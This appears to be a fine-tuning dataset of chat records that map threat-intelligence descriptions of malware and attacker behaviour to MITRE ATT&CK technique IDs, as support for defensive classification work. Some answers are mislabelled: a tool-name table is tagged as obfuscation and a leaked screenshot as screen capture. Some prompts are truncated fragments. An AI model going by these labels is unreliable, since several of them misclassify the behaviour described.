- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has used XOR-based encryption to mask C2 server locations within the trojan."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can hash then resolve API calls at runtime."
- },
- {
- "role": "assistant",
- "content": "T1027.007 - Obfuscated Files or Information: Dynamic API Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lists files in directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence can capture victim screen activity."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has appended random binary data to the end of itself to generate a large binary."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has crafted VBS-based malicious documents."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D can use the \"touch -t\" command to change timestamps."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "listed remote shared drives that were accessible from a victim."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is obfuscated using the obfuscation tool called ConfuserEx."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tool Type Internal Name Industry Name Backdoor Poison Frog BONDUPDATER Backdoor Glimpse Updated BONDUPDATER Webshell HyperShell TwoFace loader Webshell HighShell TwoFace payload Webshell Minion TwoFace payload variant DNS Hijacking Toolkit webmask Related to DNSpionage Table 1"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has used a DGA to generate a domain name for C2."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrossRAT uses run keys for persistence on Windows"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete collects the MAC address of the target computer and other network configuration information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has created a file named \"startup_vrun.bat\" in the Startup folder of a virtual machine to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Screenshot provided in leak showing administrative panel for hosting provider Berbid Server The screenshot showed the administrative panel for a VPS account on DeltaHost with four different virtual servers, as seen in Figure 20"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole uses WinRAR to compress data that is intended to be exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has used search order hijacking to force TeamViewer to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has used web services including Paste.ee to host payloads."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred can download files and additional malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Conti Ransomware uses AES-256 encryption via a hard-coded public key. The unique factor is the use of multiple threads for the encryption process, which allows faster encryption as compared to other ransomwares. The ransomware uses a CreateIoCompletionPort() call to create 32 thread instances which work simultaneously to encrypt files. After encryption, the ransomware adds extension to all the encrypted files. It can be seen in the image below"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can use the \"chmod\" utility to set a file as executable, such as \"chmod 777\" or \"chmod +x\"."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors were observed using benign executables which used DLL loadorder hijacking to activate the malware installation process."
- },
- {
- "role": "assistant",
- "content": "T1564 - Hide Artifacts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions have an embedded DLL known as MockDll that uses process hollowing and to execute another payload."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RDP for."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used valid, stolen digital certificates for some of their malware and tools."
- },
- {
- "role": "assistant",
- "content": "T1588.004 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors obtained a list of active processes on the victim and sent them to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the extensive validation described above, the backdoor enters its main execution stage. At its core, the backdoor is a very standard one that receives instructions from the C2 server, executes those instructions, and sends back information. The type of commands that can be executed range from manipulating of registry keys, to creating processes, and deleting files, etc. effectively providing the attackers with full access to the device, especially since it’s executing from a trusted, signed binary"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dipsind encodes C2 traffic with base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https://www.baomoivietnam[.]com/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (Đang tải) as shown in Figure 1 below"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects registered owner details by using the commands \"systeminfo\" and \"net config workstation\"."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this campaign, Earth Vetala threat actors used spearphishing emails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used TROJ_GETVERSION to discover system services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can use `cmd.exe` for execution on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can encrypt data prior to exfiltration by using an RSA public key."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of this research, I reached out to Benjamin Delpy, author of Mimkatz, and requested he add “SID History” to Mimikatz forged Kerberos tickets. The June 28th version of Mimikatz now includes the capability to include arbitrary SIDs in SID History on forged tickets. When a user is authenticated, the SIDs of every security group the user is a member of is added to the user’s Kerberos ticket, as well as any SIDs in the user’s SID History. Golden Tickets . Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. In other words, in a mult-domain AD forest, if the domain the Golden Ticket was created in doesn’t contain the Enterprise Admins group, the Golden Ticket won’t provide admin rights to other domains in the forest. The standard Golden Ticket is limited to the child domain it was created in, so now we add SID History to the equation… . Golden Ticket + SID History = WINNING. Things get more interesting once Mimikatz supports SID History in Golden Tickets (and Silver Tickets) since any group in the AD Forest can be included and used for authorization decisions. In order to support my research into how to expand access using SID History in Kerberos tickets across trusts (both intra-forest and external), I reached out to Benjamin Delpy in late June and requested SID History be added. Using the latest version of Mimikatz, we can now add SID History to the Golden Ticket for the Forest Enterprise Admins group. In summary, Golden Tickets can now be used to compromise any domain in the AD Forest once a single one is compromised"
- },
- {
- "role": "assistant",
- "content": "T1134.005 - Access Token Manipulation: SID-History Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body starts with gathering data on the victim’s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls."
- },
- {
- "role": "assistant",
- "content": "T1574 - Hijack Execution Flow"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson has the ability to discover pluggable/removable drives to extract files from."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used compromised websites to register custom URL schemes on a remote system."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Versions of Babuk have been packed."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used a peer-to-peer (P2P) network for C2."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Though this is unsophisticated, a remote shell does provide a highly flexible and powerful means of remote access in the hands of a skilled attacker"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used malware to delete files after they are deployed on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has stored collected date in a .tmp file."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 compromised legitimate organizations' websites to create watering holes to compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to contact the C2 server over TCP using port 80."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data above contains the hostname (‘HOSTNAME-PC’) of the victim machine, as well as an instruction"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The contents of the batch files vary depending on the OS (x64 vs x86). The batch files perform these tasks: Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1112 - Modify Registry', 'T1064 - Scripting', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device."
- },
- {
- "role": "assistant",
- "content": "T1556.004 - Network Device Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key “78563412”. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1071.001 - Application Layer Protocol: Web Protocols', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus checks for processes associated with anti-virus vendors."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
